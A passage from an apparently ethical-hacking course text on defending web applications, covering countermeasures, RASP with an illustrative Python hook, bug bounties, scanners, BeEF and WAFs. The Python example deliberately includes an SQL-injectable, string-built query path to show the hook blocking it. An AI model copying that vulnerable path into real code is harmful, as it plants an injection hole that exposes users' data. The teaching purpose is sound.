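Because the lookup key is a hash of the token, an attacker who reads the table cannot reconstruct a usable link, and because the entry is popped on first presentation, an intercepted link that the legitimate user has already clicked is worthless.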
■ Same-Site Attacks
o Detect and remove dangling DNS records (for example, CNAMEs that still point to a
deprovisioned cloud service) as part of routine validation.
o Enable a DNS misconfiguration verification and validation process.
o Promptly update DNS records on the corresponding DNS server.
o Educate users on CNAME DNS entry verification and its impact.

How to Defend Against Web Application Attacks

To defend against web application attacks, you can follow the countermeasures stated earlier.
To protect the web server, use a WAF/firewall/IDS and filter packets. Regularly update the
server's software with patches to protect it from attackers. Sanitize and filter user input,
analyze the source code for SQL injection, and minimize the use of third-party applications to
protect the web applications. Use stored procedures and parameterized queries to retrieve
data, and disable verbose error messages that can give attackers useful information; use
custom error pages instead. To limit the damage of SQL injection into the database, connect
using a non-privileged account and grant the least privileges to the database, tables, and
columns. Disable commands such as xp_cmdshell, which can affect the OS.

[Figure 14.105: Defend against web application attacks. Diagram of an attacker reaching a
login form over the Internet through a firewall to the web server, web application, DBMS,
operating system, and LDAP server, annotated with: configure the firewall to deny external
access; shut down unnecessary services; use WAF/firewall/IDS and filter packets; keep
patches current; connect to the database using a non-privileged account; use stored
procedures and parameterized queries; grant least privileges to the database, tables, and
columns; analyze the source code for SQL injection; minimize the use of third-party apps;
sanitize and filter user input; disable commands like xp_cmdshell; perform dynamic testing
and source code analysis; make [illegible] as specific as possible (label placed beside the
LDAP server); disable verbose error messages and use custom error pages.]

Figure 14.105: Defend against web application attacks
RASP for Protecting Web Servers

Runtime application self-protection (RASP) provides security to web and non-web applications
running on a server. It can detect runtime attacks on the software application layer in real
time and can provide better visibility of the hidden vulnerabilities targeted by incoming traffic.

RASP can perform continuous monitoring, help in remediating attacks at an early stage, and
generate fewer false positives.

[Slide figure: RASP benefits listed as Visibility; Collaboration and DevOps; Penetration testing;
Incident response, beside a diagram of the RASP layer on the server between the Internet and
the SQL Server.]

RASP for Protecting Web Servers


Runtime Application Self-Protection (RASP) is a technology that provides security to applications
that run on a server. RASP can be used for detecting runtime attacks on the real-time software
application layer and can provide better visibility of hidden vulnerabilities. RASP can detect
malicious activity in the incoming traffic and also validate data requests. RASP protects both
web and non-web applications, and it can be used to prevent fake programs from being
executed inside the application. RASP performs continuous monitoring to help remediate
attacks, including unknown zero-day attacks, at an early stage without any human intervention.
The RASP layer is placed within the application code. It works by monitoring the traffic coming
into the server and applies protection mechanisms whenever threat vectors are detected. All
requests are examined by the RASP layer, which sits between the server and the
application, without affecting the performance of the application. Furthermore, RASP
generates minimized false positives.
Benefits of using RASP

• Visibility: RASP offers greater visibility and lets the user have a detailed view of the
application to monitor the attacks.
• Collaboration and DevOps: It provides better collaboration and DevOps as it offers
transparency that can provide similar and detailed information to both security
professionals and developers.
• Penetration testing: The increased visibility of RASP helps in avoiding duplicate testing.
It also provides information about successful attacks and previously tested applications.
• Incident response: RASP supports incident response to facilitate logging for security and
compliance by letting the user report on customized events without modifying the
application.

[Figure residue removed. Diagram nodes: Internet, APP, RASP (Block? / Log), Server, SQL Server.]

Figure 14.106: Overview of RASP
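A minimal illustration of the mechanism described above, added here as an example (it is not code from the course material or from any RASP product): the protection layer sits in-process at the database sink, compares the data actually flowing into the query with what the request carried, and either blocks or only logs, mirroring the Block?/Log decision in Figure 14.106. The hook names, the taint rule (a raw request value may reach the database only as a bound parameter) and the SQLite table are assumptions made for the example.

```python
# Illustrative RASP-style sink hook; added example, not part of the course material.
# Assumed: begin_request() is the framework's per-request hook, protect_sql() the
# in-process layer between application and database that decides Block or Log.
import functools
import sqlite3
import threading
from dataclasses import dataclass, field

_state = threading.local()

@dataclass
class RaspContext:
    """Per-request state: raw request values, enforcement mode, decisions made."""
    untrusted: set
    mode: str = "block"        # "block" raises at the sink; "monitor" only logs
    events: list = field(default_factory=list)

class RaspBlocked(Exception):
    """Raised by the sink hook when a request is blocked."""

def begin_request(params, mode="block"):
    """Hypothetical framework hook: remember the raw string values the request
    carried (values under 3 chars ignored to avoid trivial substring matches)."""
    raw = {v for v in params.values() if isinstance(v, str) and len(v) >= 3}
    _state.ctx = RaspContext(untrusted=raw, mode=mode)
    return _state.ctx

def protect_sql(execute):
    """Wrap a DB execute(sql, args) sink. Request values may reach the database
    only as bound parameters; one appearing verbatim in the SQL text means the
    query was string-built, so the event is logged and, in block mode, stopped."""
    @functools.wraps(execute)
    def wrapper(sql, args=()):
        ctx = getattr(_state, "ctx", None)
        if ctx is not None:
            tainted = sorted(v for v in ctx.untrusted if v in sql)
            if tainted:
                ctx.events.append({"sink": "sql", "tainted": tainted,
                                   "blocked": ctx.mode == "block"})
                if ctx.mode == "block":
                    raise RaspBlocked(f"untrusted input inside SQL text: {tainted}")
        return execute(sql, args)
    return wrapper

def make_demo_db():
    """Constructed in-memory SQLite table standing in for the app's SQL Server."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user")])
    return conn

def lookup_role(conn, username, parameterized=True):
    """App code with a correct (bound parameter) and a flawed (string-built)
    query path; both pass through the same RASP-wrapped sink."""
    execute = protect_sql(lambda sql, args=(): conn.execute(sql, args).fetchone())
    if parameterized:
        return execute("SELECT role FROM users WHERE name = ?", (username,))
    return execute(f"SELECT role FROM users WHERE name = '{username}'")
```

In monitor mode the same flawed path still runs but leaves a logged event, which is the visibility benefit the text describes: the string-built query is surfaced even when the input is benign.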


Bug Bounty Programs

The bug bounty program is a challenge hosted by organizations, websites, or software developers for tech-savvy individuals or ethical hackers to participate and break into their security to report the latest bugs and vulnerabilities.

This program focuses on identifying the latest security flaws in software or any web application that most security developers fail to detect.

Individuals or ethical hackers who report the vulnerabilities are rewarded accordingly based on the severity level of the bugs.

Many organizations and companies conduct bug bounty programs to strengthen their cyber security by patching ignored vulnerabilities.

Bug Bounty Programs


A bug bounty program is a challenge or agreement hosted by organizations, websites, or
software developers for tech-savvy individuals or ethical hackers to participate and break into
their security to report the latest bugs and vulnerabilities. This program focuses on identifying
the latest security flaws in the software or any web application that most security developers
fail to detect and which may hence pose a great threat. Therefore, individuals or ethical hackers
who report the vulnerabilities are rewarded accordingly based on the severity of the bugs.
Thus, any threat or flaw that evades the developer can be mitigated before it paves the way to
sophisticated cyber-attacks. Many white-hat hackers contribute to this program as part of a
comprehensive vulnerability disclosure framework and get rewarded for their work.
Many organizations benefit from such programs, as they need to maintain a keen watch on
their system security and identify ignored vulnerabilities. Most of the latest bugs that are not
detected by legacy security testing techniques and software tools can be exploited, resulting in
major data loss. Such programs can also help organizations to avoid loss of money and
reputation in the case of a data breach, as offering rewards through the bug bounty program is
more economical. Therefore, most of the large companies use this program for strengthening
their security, which in turn enhances websites and programs.


Web Application Security Testing Tools

Acunetix Vulnerability Scanner (https://www.acunetix.com): Acunetix WVS checks web applications for SQL injections, cross-site scripting, etc. It includes advanced penetration testing tools, such as the HTTP editor and the HTTP Fuzzer.

N-Stalker Web App Security Scanner (https://www.nstalker.com): N-Stalker web app security scanner checks for vulnerabilities such as SQL injection, XSS, and other known attacks.

[Slide screenshots of Acunetix and N-Stalker omitted; see Figures 14.107 and 14.108.]

Web Application Security Testing Tools (Cont'd)

Browser Exploitation Framework (BeEF) (https://beefproject.com): The browser exploitation framework (BeEF) is an open-source penetration testing tool used to test and exploit web applications and browser-based vulnerabilities.

Additional tools listed on the slide: Metasploit (https://www.metasploit.com), PowerSploit (https://github.com), Watcher (https://www.casaba.com), Invicti (https://www.invicti.com), Arachni (https://www.arachni-scanner.com)

[Slide screenshot of BeEF omitted; see Figure 14.109.]

Web Application Security Testing Tools


There are various web application security assessment tools available for scanning, detecting,
and assessing the vulnerabilities/security of web applications. These tools reveal their security
posture; you can use them to find ways to harden security and create robust web applications.
Furthermore, these tools automate the process of accurate web application security
assessment.


This section discusses some web application security testing tools.


• Acunetix Vulnerability Scanner

Source: https://www.acunetix.com
Acunetix WVS checks web applications for SQL injections, cross-site scripting, etc. It
includes advanced penetration testing tools, such as HTTP Editor and HTTP Fuzzer. It
scans the ports of a web server and runs security checks against network services. It also
tests web forms and password-protected areas. Furthermore, it provides effective
vulnerability management by integrating with third-party issue trackers such as Jira, GitLab,
GitHub, and FogBugz.

[Screenshot residue removed. Visible panel titles: Scan, Generate Report, WAF Export; tabs Scan Information, Vulnerabilities, Site Structure, Events; columns Severity, Vulnerability, URL, Parameter, Status, Confidence %.]

Figure 14.107: Screenshot of Acunetix Web Vulnerability Scanner


■ N-Stalker Web App Security Scanner


Source: https://www.nstalker.com
N-Stalker Web App Security Scanner checks for vulnerabilities such as SQL injection, XSS,
and other known attacks. It is a useful security tool for developers, system/security
administrators, IT auditors, and staff, as it incorporates the well-known " N-Stealth HTTP
Security Scanner" and its database of 39,000 web attack signatures along with a
component-oriented web application security assessment technology.

[Screenshot residue removed. Visible panels: Dashboard, Scan Sequence, Allowed Hosts, Rejected Hosts, Browser Details, Objects, Cookies, Comments, Web Forms, E-mails, Broken Pages, Hidden Fields, Vulnerabilities; finding shown: "Application might be vulnerable to clickjacking attacks", Severity Medium, Class Clickjacking, References OWASP Top 10 A5 / CWE 693; Scan Module progress 100%, scan completed successfully.]

Figure 14.108: Screenshot of N-Stalker Web Application Security Scanner


■ Browser Exploitation Framework (BeEF)


Source: http://beefproject.com
The Browser Exploitation Framework (BeEF) is an open-source penetration testing tool
used to test and exploit web applications and browser-based vulnerabilities. It provides
the penetration tester with practical client-side attack vectors and leverages web
application and browser vulnerabilities to assess the security of a target and perform
further intrusions.

[Screenshot residue removed. BeEF Control Panel 0.5.4.0 in a browser: panels Hooked Browsers (Online Browsers, Offline Browsers) and Logs, showing a hooked browser at 10.10.1.11 and a "BeEF server started" event dated 2022-05-26.]

Figure 14.109: Screenshot of Browser Exploitation Framework (BeEF)

Some additional web application security testing tools are as follows:
■ Metasploit (https://www.metasploit.com)
■ PowerSploit (https://github.com)
■ Watcher (https://www.casaba.com)
■ Invicti (https://www.invicti.com)
■ Arachni (https://www.arachni-scanner.com)


Web Application Firewalls

dotDefender (http://www.applicure.com): dotDefender protects websites from malicious attacks such as SQL injection, path traversal, cross-site scripting, and others that result in website defacement. It inspects HTTP/HTTPS traffic for suspicious behavior.

Additional WAFs listed on the slide: HCL AppScan Standard (https://www.hcltechsw.com), Alteon Integrated WAF (AppWall) (https://www.radware.com), Qualys WAF (https://www.qualys.com), Barracuda Web Application Firewall (https://www.barracuda.com), ThreatSentry (https://www.privacyware.com)

[Slide screenshot of dotDefender omitted; see Figure 14.110.]

Web Application Firewalls

Web application firewalls (WAFs) secure websites, web applications, and web services against
known and unknown attacks. They prevent data theft and manipulation of sensitive corporate
and customer information. Some of the most commonly used WAFs are as follows:
• dotDefender
Source: http://www.applicure.com
dotDefender™ is a software-based WAF that protects your website from malicious
attacks such as SQL injection, path traversal, cross-site scripting, and others that result
in website defacement. It complements the network firewall, IPS, and other network-
based Internet security products. It inspects HTTP/HTTPS traffic for suspicious behavior.


[Screenshot residue removed. dotDefender console: Engine started, License (Never Expires), Rule Updates (Automatic), Global Settings, Default Security Profile (Protection), User-Defined Request Rules pane with Add New Rule; rule categories shown include Buffer Overflow, SQL Injection, Cross-Site Scripting, Path Traversal, Probing, Code Injection, Information Leakage, Remote Command Execution, Cookie Manipulation, Windows Directories and Files, XML Schema, XPath Injection, XPath Cross Site Scripting, Signatures; site list with per-site protection profiles.]

Figure 14.110: Screenshot of dotDefender web application firewall

Some additional web application firewalls are as follows:

■ HCL AppScan® Standard (https://www.hcltechsw.com)
■ Alteon Integrated WAF (AppWall) (https://www.radware.com)
■ Qualys WAF (https://www.qualys.com)
■ Barracuda Web Application Firewall (https://www.barracuda.com)
■ ThreatSentry (https://www.privacyware.com)


Module Summary

In this module, we have discussed the following:

► Web application concepts
► Various web application attacks
► Web application hacking methodology, which covers footprinting web infrastructure, analyzing web applications, bypassing client-side controls, attacking authentication mechanisms, etc.
► Various web application hacking tools
► Web APIs, webhooks, and web shell concepts
► Hacking web applications via web APIs, webhooks, and web shells
► Various countermeasures that are to be employed to prevent web application hacking attempts by threat actors
► Securing web applications using various security tools

In the next module, we will discuss in detail how attackers, as well as ethical hackers and pen testers, perform SQL injection attacks on the target web application.

Module Summary
This module presented web application concepts. It also discussed various web application
attacks in detail. Furthermore, it described the web application hacking methodology in detail.
In addition, it illustrated various web application hacking tools. It also discussed web API,
webhooks, and web shell concepts. Moreover, it explained ways of hacking web applications via
web APIs, webhooks, and web shells. Subsequently, it presented various countermeasures
against threat actors' attempts to hack web applications. Finally, it ended with a detailed
discussion on how to secure web applications using various security tools.
In the next module, we will discuss in detail how attackers as well as ethical hackers and pen
testers perform SQL injection attacks on the target web application.
